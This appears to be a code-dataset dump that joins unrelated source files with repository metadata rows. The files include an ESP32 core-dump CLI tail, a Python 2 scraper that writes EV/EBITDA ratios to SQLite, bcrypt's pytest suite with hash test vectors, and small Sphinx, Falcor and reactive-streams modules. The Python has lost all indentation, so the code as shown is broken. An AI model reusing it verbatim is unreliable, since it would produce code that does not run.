common_args.add_argument('--core-format', '-t', choices=['b64', 'elf', 'raw'], default='elf',
help='(elf, raw or b64). File specified with "-c" is an ELF ("elf"), '
'raw (raw) or base64-encoded (b64) binary')
common_args.add_argument('--off', '-o', type=int,
help='Offset of coredump partition in flash (type "make partition_table" to see).')
common_args.add_argument('--save-core', '-s',
help='Save core to file. Otherwise temporary core file will be deleted. '
'Does not work with "-c"', )
common_args.add_argument('--rom-elf', '-r', default='esp32_rom.elf',
help='Path to ROM ELF file.')
common_args.add_argument('prog', help='Path to program\'s ELF binary')
operations = parser.add_subparsers(dest='operation')
operations.add_parser('dbg_corefile', parents=[common_args],
help='Starts GDB debugging session with specified corefile')
info_coredump = operations.add_parser('info_corefile', parents=[common_args],
help='Print core dump info from file')
info_coredump.add_argument('--print-mem', '-m', action='store_true',
help='Print memory dump')
args = parser.parse_args()
if args.debug == 0:
log_level = logging.CRITICAL
elif args.debug == 1:
log_level = logging.ERROR
elif args.debug == 2:
log_level = logging.WARNING
elif args.debug == 3:
log_level = logging.INFO
else:
log_level = logging.DEBUG
logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)
print('espcoredump.py v%s' % __version__)
if args.operation == 'info_corefile':
info_corefile()
elif args.operation == 'dbg_corefile':
dbg_corefile()
else:
raise ValueError('Please specify action, should be info_corefile or dbg_corefile')
| 44.07
| 115
| 0.553438
|
126e165b2c882acbbb1ce347dc28b3d8dc3875a7
| 3,254
|
py
|
Python
|
bookkeeping/evEbitdaUpdate.py
|
investr/investr-docker
|
f58bf446185b88e447b94bd8bebcc38ac5d0c3a4
|
[
"MIT"
] | 35
|
2019-07-25T05:47:57.000Z
|
2022-01-30T11:36:09.000Z
|
bookkeeping/evEbitdaUpdate.py
|
cbzxt/investr-docker
|
592640bafe9612976fff329e45daf4efcc8450bb
|
[
"MIT"
] | 3
|
2019-08-13T13:30:09.000Z
|
2019-08-23T04:10:03.000Z
|
bookkeeping/evEbitdaUpdate.py
|
cbzxt/investr-docker
|
592640bafe9612976fff329e45daf4efcc8450bb
|
[
"MIT"
] | 11
|
2019-07-25T07:42:12.000Z
|
2020-06-27T07:18:51.000Z
|
#!/usr/bin/env python
# Initially created by: Chirag Rathod for https://investr.co.in (Gentle Request: Please don't delete this line)
#
# Updates enterprise value and EBITDA
#
# Note: This script silently passes the exceptions so be careful!
# Check the log file for any exceptions.
#
import os
import sys
import traceback
import requests
import logging
import sqlite3 as lite
from moneyControl import *
from BeautifulSoup import BeautifulSoup
def main():
# Get the arguments passed in the following format:
# 1st parameter: File Name
# 2nd parameter: 1 or 0 (1 Updates backend DB, 0 just logs the results)
# 3rd or more parameters: Stocks IDs
if len(sys.argv) < 3:
print 'Pass correct number of parameters!'
exit()
args = sys.argv
idsToProcess = args[2:]
idsToProcess = map(int, idsToProcess) # Convert the string array to int array
# Logging
logFile = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'logs' + os.sep + os.path.splitext(os.path.basename(__file__))[0] + '.log'
logging.basicConfig(filename=logFile, level=logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
# Get and populate data
try:
stocksDBLocation = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'ec2stocks.db'
con = lite.connect(stocksDBLocation)
cur = con.cursor()
# Get the tables in this DB
cur.execute('SELECT ID, MC_CODE, MC_NAME, MC_S_OR_C, MC_URL, LAST_QTR FROM MASTER')
rows = cur.fetchall()
# Loop thru the data
for row in rows:
try:
myid = row[0]
mcCode = row[1]
mcName = row[2]
mcSOrC = row[3]
mcUrl = row[4]
lastQtr = row[5]
if myid not in idsToProcess:
continue
# First get EV/EBITDA ratio for the last two years from ratios page
ratiosUrl = 'http://www.moneycontrol.com/financials/' + mcName + '/ratiosVI/' + mcCode
yearlyResults = requests.get(ratiosUrl)
parsedHtml = BeautifulSoup(yearlyResults.text)
(dataY1, dataY2) = getMCData(parsedHtml, 'EV/EBITDA (X)', 2)
# Banks dont have this ratio and will return -999.99. Change it to 0.
if dataY1 == -999.99:
dataY1 = 0
if dataY2 == -999.99:
dataY2 = 0
# Update DB only if the second parameter is 1. When 0, we will just log the proposed update.
if args[1] == "1":
cur.execute('UPDATE MASTER SET EV_EBITDA_Y1 = ?, EV_EBITDA_Y2 = ? WHERE ID = ?', (dataY1, dataY2, myid))
logging.info('Updating ID: %s \n EV_EBITDA_Y1: %s | EV_EBITDA_Y2: %s \n', myid, dataY1, dataY2)
except Exception:
logging.info('Exception raised while processing: ' + str(myid) + ' ... Name ... ' + mcName)
logging.info(traceback.format_exc())
except lite.Error as er:
logging.info(er)
finally:
con.commit()
con.close()
logging.info('Finished Updating Data!')
if __name__ == '__main__':
main()
| 32.54
| 143
| 0.594038
|
7ad40f76349177e6b366e443bbd2bd27ff095c62
| 15,656
|
py
|
Python
|
tests/test_bcrypt.py
|
balabit-deps/balabit-os-7-python-bcrypt
|
bf0105f1a09bd668e6f61a5497ae528cd0877080
|
[
"Apache-2.0"
] | null | null | null |
tests/test_bcrypt.py
|
balabit-deps/balabit-os-7-python-bcrypt
|
bf0105f1a09bd668e6f61a5497ae528cd0877080
|
[
"Apache-2.0"
] | null | null | null |
tests/test_bcrypt.py
|
balabit-deps/balabit-os-7-python-bcrypt
|
bf0105f1a09bd668e6f61a5497ae528cd0877080
|
[
"Apache-2.0"
] | null | null | null |
import os
import pytest
import six
import bcrypt
_test_vectors = [
(
b"Kk4DQuMMfZL9o",
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO",
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO026BWLIoQMD/TXg5uZV.0P.uO8m3YEm",
),
(
b"9IeRXmnGxMYbs",
b"$2b$04$pQ7gRO7e6wx/936oXhNjrO",
b"$2b$04$pQ7gRO7e6wx/936oXhNjrOUNOHL1D0h1N2IDbJZYs.1ppzSof6SPy",
),
(
b"xVQVbwa1S0M8r",
b"$2b$04$SQe9knOzepOVKoYXo9xTte",
b"$2b$04$SQe9knOzepOVKoYXo9xTteNYr6MBwVz4tpriJVe3PNgYufGIsgKcW",
),
(
b"Zfgr26LWd22Za",
b"$2b$04$eH8zX.q5Q.j2hO1NkVYJQO",
b"$2b$04$eH8zX.q5Q.j2hO1NkVYJQOM6KxntS/ow3.YzVmFrE4t//CoF4fvne",
),
(
b"Tg4daC27epFBE",
b"$2b$04$ahiTdwRXpUG2JLRcIznxc.",
b"$2b$04$ahiTdwRXpUG2JLRcIznxc.s1.ydaPGD372bsGs8NqyYjLY1inG5n2",
),
(
b"xhQPMmwh5ALzW",
b"$2b$04$nQn78dV0hGHf5wUBe0zOFu",
b"$2b$04$nQn78dV0hGHf5wUBe0zOFu8n07ZbWWOKoGasZKRspZxtt.vBRNMIy",
),
(
b"59je8h5Gj71tg",
b"$2b$04$cvXudZ5ugTg95W.rOjMITu",
b"$2b$04$cvXudZ5ugTg95W.rOjMITuM1jC0piCl3zF5cmGhzCibHZrNHkmckG",
),
(
b"wT4fHJa2N9WSW",
b"$2b$04$YYjtiq4Uh88yUsExO0RNTu",
b"$2b$04$YYjtiq4Uh88yUsExO0RNTuEJ.tZlsONac16A8OcLHleWFjVawfGvO",
),
(
b"uSgFRnQdOgm4S",
b"$2b$04$WLTjgY/pZSyqX/fbMbJzf.",
b"$2b$04$WLTjgY/pZSyqX/fbMbJzf.qxCeTMQOzgL.CimRjMHtMxd/VGKojMu",
),
(
b"tEPtJZXur16Vg",
b"$2b$04$2moPs/x/wnCfeQ5pCheMcu",
b"$2b$04$2moPs/x/wnCfeQ5pCheMcuSJQ/KYjOZG780UjA/SiR.KsYWNrC7SG",
),
(
b"vvho8C6nlVf9K",
b"$2b$04$HrEYC/AQ2HS77G78cQDZQ.",
b"$2b$04$HrEYC/AQ2HS77G78cQDZQ.r44WGcruKw03KHlnp71yVQEwpsi3xl2",
),
(
b"5auCCY9by0Ruf",
b"$2b$04$vVYgSTfB8KVbmhbZE/k3R.",
b"$2b$04$vVYgSTfB8KVbmhbZE/k3R.ux9A0lJUM4CZwCkHI9fifke2.rTF7MG",
),
(
b"GtTkR6qn2QOZW",
b"$2b$04$JfoNrR8.doieoI8..F.C1O",
b"$2b$04$JfoNrR8.doieoI8..F.C1OQgwE3uTeuardy6lw0AjALUzOARoyf2m",
),
(
b"zKo8vdFSnjX0f",
b"$2b$04$HP3I0PUs7KBEzMBNFw7o3O",
b"$2b$04$HP3I0PUs7KBEzMBNFw7o3O7f/uxaZU7aaDot1quHMgB2yrwBXsgyy",
),
(
b"I9VfYlacJiwiK",
b"$2b$04$xnFVhJsTzsFBTeP3PpgbMe",
b"$2b$04$xnFVhJsTzsFBTeP3PpgbMeMREb6rdKV9faW54Sx.yg9plf4jY8qT6",
),
(
b"VFPO7YXnHQbQO",
b"$2b$04$WQp9.igoLqVr6Qk70mz6xu",
b"$2b$04$WQp9.igoLqVr6Qk70mz6xuRxE0RttVXXdukpR9N54x17ecad34ZF6",
),
(
b"VDx5BdxfxstYk",
b"$2b$04$xgZtlonpAHSU/njOCdKztO",
b"$2b$04$xgZtlonpAHSU/njOCdKztOPuPFzCNVpB4LGicO4/OGgHv.uKHkwsS",
),
(
b"dEe6XfVGrrfSH",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe",
),
(
b"cTT0EAFdwJiLn",
b"$2b$04$7/Qj7Kd8BcSahPO4khB8me",
b"$2b$04$7/Qj7Kd8BcSahPO4khB8me4ssDJCW3r4OGYqPF87jxtrSyPj5cS5m",
),
(
b"J8eHUDuxBB520",
b"$2b$04$VvlCUKbTMjaxaYJ.k5juoe",
b"$2b$04$VvlCUKbTMjaxaYJ.k5juoecpG/7IzcH1AkmqKi.lIZMVIOLClWAk.",
),
(
b"U*U",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.E5YPO9kmyuRGyh0XouQYb4YMJKvyOeW",
),
(
b"U*U*",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.VGOzA784oUp/Z0DY336zx7pLYAy0lwK",
),
(
b"U*U*U",
b"$2a$05$XXXXXXXXXXXXXXXXXXXXXO",
b"$2a$05$XXXXXXXXXXXXXXXXXXXXXOAcXxm9kjPGEMsLznoKqmqw7tc8WCx4a",
),
(
b"0123456789abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
b"chars after 72 are ignored",
b"$2a$05$abcdefghijklmnopqrstuu",
b"$2a$05$abcdefghijklmnopqrstuu5s2v8.iXieOjg/.AySBTTZIIVFJeBui",
),
(
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"chars after 72 are ignored as usual",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.swQOIzjOiJ9GHEPuhEkvqrUyvWhEMx6"
),
(
b"\xa3",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.Sa7shbm4.OzKpvFnX1pQLmQW96oUlCq"
),
]
_2y_test_vectors = [
(
b"\xa3",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.Sa7shbm4.OzKpvFnX1pQLmQW96oUlCq",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.Sa7shbm4.OzKpvFnX1pQLmQW96oUlCq",
),
(
b"\xff\xff\xa3",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.CE5elHaaO4EbggVDjb8P19RukzXSM3e",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.CE5elHaaO4EbggVDjb8P19RukzXSM3e",
),
]
def test_gensalt_basic(monkeypatch):
monkeypatch.setattr(os, "urandom", lambda n: b"0000000000000000")
assert bcrypt.gensalt() == b"$2b$12$KB.uKB.uKB.uKB.uKB.uK."
@pytest.mark.parametrize(("rounds", "expected"), [
(4, b"$2b$04$KB.uKB.uKB.uKB.uKB.uK."),
(5, b"$2b$05$KB.uKB.uKB.uKB.uKB.uK."),
(6, b"$2b$06$KB.uKB.uKB.uKB.uKB.uK."),
(7, b"$2b$07$KB.uKB.uKB.uKB.uKB.uK."),
(8, b"$2b$08$KB.uKB.uKB.uKB.uKB.uK."),
(9, b"$2b$09$KB.uKB.uKB.uKB.uKB.uK."),
(10, b"$2b$10$KB.uKB.uKB.uKB.uKB.uK."),
(11, b"$2b$11$KB.uKB.uKB.uKB.uKB.uK."),
(12, b"$2b$12$KB.uKB.uKB.uKB.uKB.uK."),
(13, b"$2b$13$KB.uKB.uKB.uKB.uKB.uK."),
(14, b"$2b$14$KB.uKB.uKB.uKB.uKB.uK."),
(15, b"$2b$15$KB.uKB.uKB.uKB.uKB.uK."),
(16, b"$2b$16$KB.uKB.uKB.uKB.uKB.uK."),
(17, b"$2b$17$KB.uKB.uKB.uKB.uKB.uK."),
(18, b"$2b$18$KB.uKB.uKB.uKB.uKB.uK."),
(19, b"$2b$19$KB.uKB.uKB.uKB.uKB.uK."),
(20, b"$2b$20$KB.uKB.uKB.uKB.uKB.uK."),
(21, b"$2b$21$KB.uKB.uKB.uKB.uKB.uK."),
(22, b"$2b$22$KB.uKB.uKB.uKB.uKB.uK."),
(23, b"$2b$23$KB.uKB.uKB.uKB.uKB.uK."),
(24, b"$2b$24$KB.uKB.uKB.uKB.uKB.uK."),
])
def test_gensalt_rounds_valid(rounds, expected, monkeypatch):
monkeypatch.setattr(os, "urandom", lambda n: b"0000000000000000")
assert bcrypt.gensalt(rounds) == expected
@pytest.mark.parametrize("rounds", list(range(1, 4)))
def test_gensalt_rounds_invalid(rounds):
with pytest.raises(ValueError):
bcrypt.gensalt(rounds)
def test_gensalt_bad_prefix():
with pytest.raises(ValueError):
bcrypt.gensalt(prefix="bad")
def test_gensalt_2a_prefix(monkeypatch):
monkeypatch.setattr(os, "urandom", lambda n: b"0000000000000000")
assert bcrypt.gensalt(prefix=b"2a") == b"$2a$12$KB.uKB.uKB.uKB.uKB.uK."
@pytest.mark.parametrize(("password", "salt", "hashed"), _test_vectors)
def test_hashpw_new(password, salt, hashed):
assert bcrypt.hashpw(password, salt) == hashed
@pytest.mark.parametrize(("password", "salt", "hashed"), _test_vectors)
def test_checkpw(password, salt, hashed):
assert bcrypt.checkpw(password, hashed) is True
@pytest.mark.parametrize(("password", "salt", "hashed"), _test_vectors)
def test_hashpw_existing(password, salt, hashed):
assert bcrypt.hashpw(password, hashed) == hashed
@pytest.mark.parametrize(("password", "hashed", "expected"), _2y_test_vectors)
def test_hashpw_2y_prefix(password, hashed, expected):
assert bcrypt.hashpw(password, hashed) == expected
@pytest.mark.parametrize(("password", "hashed", "expected"), _2y_test_vectors)
def test_checkpw_2y_prefix(password, hashed, expected):
assert bcrypt.checkpw(password, hashed) is True
def test_hashpw_invalid():
with pytest.raises(ValueError):
bcrypt.hashpw(b"password", b"$2z$04$cVWp4XaNU8a4v1uMRum2SO")
def test_checkpw_wrong_password():
assert bcrypt.checkpw(
b"badpass",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
) is False
def test_checkpw_bad_salt():
with pytest.raises(ValueError):
bcrypt.checkpw(
b"badpass",
b"$2b$04$?Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
)
def test_checkpw_str_password():
with pytest.raises(TypeError):
bcrypt.checkpw(
six.text_type("password"),
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO",
)
def test_checkpw_str_salt():
with pytest.raises(TypeError):
bcrypt.checkpw(
b"password",
six.text_type("$2b$04$cVWp4XaNU8a4v1uMRum2SO"),
)
def test_hashpw_str_password():
with pytest.raises(TypeError):
bcrypt.hashpw(
six.text_type("password"),
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO",
)
def test_hashpw_str_salt():
with pytest.raises(TypeError):
bcrypt.hashpw(
b"password",
six.text_type("$2b$04$cVWp4XaNU8a4v1uMRum2SO"),
)
def test_checkpw_nul_byte():
with pytest.raises(ValueError):
bcrypt.checkpw(
b"abc\0def",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
)
with pytest.raises(ValueError):
bcrypt.checkpw(
b"abcdef",
b"$2b$04$2S\0w3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
)
def test_hashpw_nul_byte():
salt = bcrypt.gensalt(4)
with pytest.raises(ValueError):
bcrypt.hashpw(b"abc\0def", salt)
def test_checkpw_extra_data():
salt = bcrypt.gensalt(4)
hashed = bcrypt.hashpw(b"abc", salt)
assert bcrypt.checkpw(b"abc", hashed)
assert bcrypt.checkpw(b"abc", hashed + b"extra") is False
assert bcrypt.checkpw(b"abc", hashed[:-10]) is False
@pytest.mark.parametrize(
("rounds", "password", "salt", "expected"),
[[
4, b"password", b"salt",
b"\x5b\xbf\x0c\xc2\x93\x58\x7f\x1c\x36\x35\x55\x5c\x27\x79\x65\x98"
b"\xd4\x7e\x57\x90\x71\xbf\x42\x7e\x9d\x8f\xbe\x84\x2a\xba\x34\xd9"
], [
4, b"password", b"\x00",
b"\xc1\x2b\x56\x62\x35\xee\xe0\x4c\x21\x25\x98\x97\x0a\x57\x9a\x67"
], [
4, b"\x00", b"salt",
b"\x60\x51\xbe\x18\xc2\xf4\xf8\x2c\xbf\x0e\xfe\xe5\x47\x1b\x4b\xb9"
], [
# nul bytes in password and string
4, b"password\x00", b"salt\x00",
b"\x74\x10\xe4\x4c\xf4\xfa\x07\xbf\xaa\xc8\xa9\x28\xb1\x72\x7f\xac"
b"\x00\x13\x75\xe7\xbf\x73\x84\x37\x0f\x48\xef\xd1\x21\x74\x30\x50"
], [
4, b"pass\x00wor", b"sa\0l",
b"\xc2\xbf\xfd\x9d\xb3\x8f\x65\x69\xef\xef\x43\x72\xf4\xde\x83\xc0"
], [
4, b"pass\x00word", b"sa\0lt",
b"\x4b\xa4\xac\x39\x25\xc0\xe8\xd7\xf0\xcd\xb6\xbb\x16\x84\xa5\x6f"
], [
# bigger key
8, b"password", b"salt",
b"\xe1\x36\x7e\xc5\x15\x1a\x33\xfa\xac\x4c\xc1\xc1\x44\xcd\x23\xfa"
b"\x15\xd5\x54\x84\x93\xec\xc9\x9b\x9b\x5d\x9c\x0d\x3b\x27\xbe\xc7"
b"\x62\x27\xea\x66\x08\x8b\x84\x9b\x20\xab\x7a\xa4\x78\x01\x02\x46"
b"\xe7\x4b\xba\x51\x72\x3f\xef\xa9\xf9\x47\x4d\x65\x08\x84\x5e\x8d"
], [
# more rounds
42, b"password", b"salt",
b"\x83\x3c\xf0\xdc\xf5\x6d\xb6\x56\x08\xe8\xf0\xdc\x0c\xe8\x82\xbd"
], [
# longer password
8,
b"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do "
b"eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut "
b"enim ad minim veniam, quis nostrud exercitation ullamco laboris "
b"nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor "
b"in reprehenderit in voluptate velit esse cillum dolore eu fugiat "
b"nulla pariatur. Excepteur sint occaecat cupidatat non proident, "
b"sunt in culpa qui officia deserunt mollit anim id est laborum.",
b"salis\x00",
b"\x10\x97\x8b\x07\x25\x3d\xf5\x7f\x71\xa1\x62\xeb\x0e\x8a\xd3\x0a"
], [
# "unicode"
8,
b"\x0d\xb3\xac\x94\xb3\xee\x53\x28\x4f\x4a\x22\x89\x3b\x3c\x24\xae",
b"\x3a\x62\xf0\xf0\xdb\xce\xf8\x23\xcf\xcc\x85\x48\x56\xea\x10\x28",
b"\x20\x44\x38\x17\x5e\xee\x7c\xe1\x36\xc9\x1b\x49\xa6\x79\x23\xff"
], [
# very large key
8,
b"\x0d\xb3\xac\x94\xb3\xee\x53\x28\x4f\x4a\x22\x89\x3b\x3c\x24\xae",
b"\x3a\x62\xf0\xf0\xdb\xce\xf8\x23\xcf\xcc\x85\x48\x56\xea\x10\x28",
b"\x20\x54\xb9\xff\xf3\x4e\x37\x21\x44\x03\x34\x74\x68\x28\xe9\xed"
b"\x38\xde\x4b\x72\xe0\xa6\x9a\xdc\x17\x0a\x13\xb5\xe8\xd6\x46\x38"
b"\x5e\xa4\x03\x4a\xe6\xd2\x66\x00\xee\x23\x32\xc5\xed\x40\xad\x55"
b"\x7c\x86\xe3\x40\x3f\xbb\x30\xe4\xe1\xdc\x1a\xe0\x6b\x99\xa0\x71"
b"\x36\x8f\x51\x8d\x2c\x42\x66\x51\xc9\xe7\xe4\x37\xfd\x6c\x91\x5b"
b"\x1b\xbf\xc3\xa4\xce\xa7\x14\x91\x49\x0e\xa7\xaf\xb7\xdd\x02\x90"
b"\xa6\x78\xa4\xf4\x41\x12\x8d\xb1\x79\x2e\xab\x27\x76\xb2\x1e\xb4"
b"\x23\x8e\x07\x15\xad\xd4\x12\x7d\xff\x44\xe4\xb3\xe4\xcc\x4c\x4f"
b"\x99\x70\x08\x3f\x3f\x74\xbd\x69\x88\x73\xfd\xf6\x48\x84\x4f\x75"
b"\xc9\xbf\x7f\x9e\x0c\x4d\x9e\x5d\x89\xa7\x78\x39\x97\x49\x29\x66"
b"\x61\x67\x07\x61\x1c\xb9\x01\xde\x31\xa1\x97\x26\xb6\xe0\x8c\x3a"
b"\x80\x01\x66\x1f\x2d\x5c\x9d\xcc\x33\xb4\xaa\x07\x2f\x90\xdd\x0b"
b"\x3f\x54\x8d\x5e\xeb\xa4\x21\x13\x97\xe2\xfb\x06\x2e\x52\x6e\x1d"
b"\x68\xf4\x6a\x4c\xe2\x56\x18\x5b\x4b\xad\xc2\x68\x5f\xbe\x78\xe1"
b"\xc7\x65\x7b\x59\xf8\x3a\xb9\xab\x80\xcf\x93\x18\xd6\xad\xd1\xf5"
b"\x93\x3f\x12\xd6\xf3\x61\x82\xc8\xe8\x11\x5f\x68\x03\x0a\x12\x44"
], [
# UTF-8 Greek characters "odysseus" / "telemachos"
8,
b"\xe1\xbd\x88\xce\xb4\xcf\x85\xcf\x83\xcf\x83\xce\xb5\xcf\x8d\xcf"
b"\x82",
b"\xce\xa4\xce\xb7\xce\xbb\xce\xad\xce\xbc\xce\xb1\xcf\x87\xce\xbf"
b"\xcf\x82",
b"\x43\x66\x6c\x9b\x09\xef\x33\xed\x8c\x27\xe8\xe8\xf3\xe2\xd8\xe6"
]])
def test_kdf(rounds, password, salt, expected):
derived = bcrypt.kdf(password, salt, len(expected), rounds)
assert derived == expected
def test_kdf_str_password():
with pytest.raises(TypeError):
bcrypt.kdf(
six.text_type("password"), b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 10, 10
)
def test_kdf_str_salt():
with pytest.raises(TypeError):
bcrypt.kdf(
b"password", six.text_type("salt"), 10, 10
)
def test_kdf_no_warn_rounds():
bcrypt.kdf(
b"password", b"salt", 10, 10, True
)
def test_kdf_warn_rounds():
with pytest.warns(UserWarning):
bcrypt.kdf(
b"password", b"salt", 10, 10
)
@pytest.mark.parametrize(
("password", "salt", "desired_key_bytes", "rounds", "error"),
[
(u"pass", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 10, 10, TypeError),
(b"password", u"salt", 10, 10, TypeError),
(b"", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 10, 10, ValueError),
(b"password", b"", 10, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 0, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", -3, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 513, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 20, 0, ValueError),
]
)
def test_invalid_params(password, salt, desired_key_bytes, rounds, error):
with pytest.raises(error):
bcrypt.kdf(password, salt, desired_key_bytes, rounds)
def test_bcrypt_assert():
with pytest.raises(SystemError):
bcrypt._bcrypt_assert(False)
def test_2a_wraparound_bug():
assert bcrypt.hashpw(
(b"0123456789" * 26)[:255], b"$2a$04$R1lJ2gkNaoPGdafE.H.16."
) == b"$2a$04$R1lJ2gkNaoPGdafE.H.16.1MKHPvmKwryeulRe225LKProWYwt9Oi"
| 33.960954
| 79
| 0.627299
|
e0f07f13b6ce7a4c7cef814f50fc49aefcd5423e
| 322
|
py
|
Python
|
reactivestreams/subscription.py
|
Precognize/rsocket-py
|
31704d53c232e0c0f53783b9a56117e5bd0645ce
|
[
"MIT"
] | null | null | null |
reactivestreams/subscription.py
|
Precognize/rsocket-py
|
31704d53c232e0c0f53783b9a56117e5bd0645ce
|
[
"MIT"
] | null | null | null |
reactivestreams/subscription.py
|
Precognize/rsocket-py
|
31704d53c232e0c0f53783b9a56117e5bd0645ce
|
[
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
class Subscription(metaclass=ABCMeta):
@abstractmethod
def request(self, n: int):
...
@abstractmethod
def cancel(self):
...
class DefaultSubscription(Subscription):
def request(self, n: int):
pass
def cancel(self):
pass
| 16.1
| 40
| 0.624224
|
5ba4715c45b716fb295eb9544e538d6873238a98
| 472
|
py
|
Python
|
WEB-INF/addons/helloworld/setup.py
|
wnagy/pymframe
|
1b0a220ad943ad4ca2d712e308d9a72d7388e831
|
[
"Apache-2.0"
] | null | null | null |
WEB-INF/addons/helloworld/setup.py
|
wnagy/pymframe
|
1b0a220ad943ad4ca2d712e308d9a72d7388e831
|
[
"Apache-2.0"
] | null | null | null |
WEB-INF/addons/helloworld/setup.py
|
wnagy/pymframe
|
1b0a220ad943ad4ca2d712e308d9a72d7388e831
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Helloworld Addon
W. Nagy
Minimales Plugin
Verwendet lokales Config und Controller des aufrufenden Programms.
"""
from helloworld.conf.config import Config as HelloworldConfig
class Helloworld(object):
controller = None
def __init__(self,controller):
self.controller = controller
def get(self):
config = HelloworldConfig()
self.controller.render('The Helloworld says: "{0}"'.format(config.greetings))
| 20.521739
| 83
| 0.70339
|
8486a84b5d143fee738e6079d074c5af9a420842
| 487
|
py
|
Python
|
src/sphinxcontrib/yamcs/javadoc.py
|
yamcs/sphinxcontrib-yamcs
|
721f0df3ad2137e67cf3cd664cb358655fb0df57
|
[
"BSD-2-Clause"
] | null | null | null |
src/sphinxcontrib/yamcs/javadoc.py
|
yamcs/sphinxcontrib-yamcs
|
721f0df3ad2137e67cf3cd664cb358655fb0df57
|
[
"BSD-2-Clause"
] | null | null | null |
src/sphinxcontrib/yamcs/javadoc.py
|
yamcs/sphinxcontrib-yamcs
|
721f0df3ad2137e67cf3cd664cb358655fb0df57
|
[
"BSD-2-Clause"
] | null | null | null |
from docutils import nodes, utils
def javadoc_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
print_short_name = text.startswith("~")
if print_short_name:
text = text[1:]
idx = text.rindex(".")
label = text[(idx + 1) :]
else:
label = text
ref = "https://yamcs.org/javadoc/yamcs/%s.html" % text.replace(".", "/")
node = nodes.reference(rawtext, utils.unescape(label), refuri=ref, **options)
return [node], []
| 30.4375
| 81
| 0.603696
|
b74fb140bfff012e7f0c4330c7dbf721547c6ef7
| 614
|
py
|
Python
|
Tests/image_tests/renderpasses/test_MVecRaster.py
|
wsqjny/Falcor
|
9ebbb0a0426304a542a6ec314c9470e0c043093f
|
[
"BSD-3-Clause"
] | 1,615
|
2017-07-28T05:41:39.000Z
|
2022-03-31T16:31:57.000Z
|
Tests/image_tests/renderpasses/test_MVecRaster.py
|
shill-lucasfilm/Falcor
|
5236495554f57a734cc815522d95ae9a7dfe458a
|
[
"BSD-3-Clause"
] | 232
|
2017-08-03T10:58:41.000Z
|
2022-03-31T16:17:46.000Z
|
Tests/image_tests/renderpasses/test_MVecRaster.py
|
shill-lucasfilm/Falcor
|
5236495554f57a734cc815522d95ae9a7dfe458a
|
[
"BSD-3-Clause"
] | 383
|
2017-07-30T04:28:34.000Z
|
2022-03-30T05:12:13.000Z
|
import sys
sys.path.append('..')
from helpers import render_frames
from graphs.MVecRaster import MVecRaster as g
from falcor import *
sceneFile = 'Cerberus/Standard/Cerberus.pyscene'
m.addGraph(g)
m.loadScene(sceneFile)
# default
render_frames(m, 'default', frames=[1,16,64])
# re-load scene with 32-bit indices
m.loadScene(sceneFile, buildFlags=SceneBuilderFlags.Force32BitIndices)
render_frames(m, '32bit-indices', frames=[1,16,64])
# re-load scene with non-indexed vertices
m.loadScene(sceneFile, buildFlags=SceneBuilderFlags.NonIndexedVertices)
render_frames(m, 'non-indexed', frames=[1,16,64])
exit()
| 23.615385
| 71
| 0.778502
|
92f2f0df370ff6ad3c19574c1c849f73c1ae1bfc
| 1,015
|
py
|
Python
|
like/migrations/0001_initial.py
|
engineer237/Project-Track-Api
|
505f95d886144bbafd00797b25bd1c8940529e3f
|
[
"MIT"
] | null | null | null |
like/migrations/0001_initial.py
|
engineer237/Project-Track-Api
|
